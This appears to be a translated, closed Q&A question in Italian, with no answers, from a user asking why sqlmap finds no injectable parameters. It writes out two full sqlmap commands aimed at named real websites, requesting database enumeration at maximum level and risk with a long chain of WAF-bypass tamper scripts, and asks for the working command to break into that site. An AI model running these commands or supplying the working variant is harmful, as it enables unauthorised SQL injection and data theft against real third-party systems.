Il parametro Sqlmap "potrebbe non essere iniettabile" [chiuso]

1

Sto iniziando con sqlmap e ho il seguente problema: quando provo a usare sqlmap (cercando di bypassare waf) usando questo frammento:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

o questo:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Ho visto che nella console appare:

[WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable 
[WARNING] heuristic (basic) test shows that GET parameter 'view' might not be injectable

Ho anche provato a trovare un URL all'interno del mio sito simile a: http://www.cafe53rd.com/menu.php?item_id=3 perché ho controllato che questo tipo di URL sia più facile da accedere ma non riesco a trovarlo per il sito che sto verificando.

Quale sarebbe il codice giusto per renderlo nel seguente sito ("http: // prefing ...")

    
posta Alan Alvarez 17.07.2015 - 21:50
fonte

0 risposte

Leggi altre domande sui tag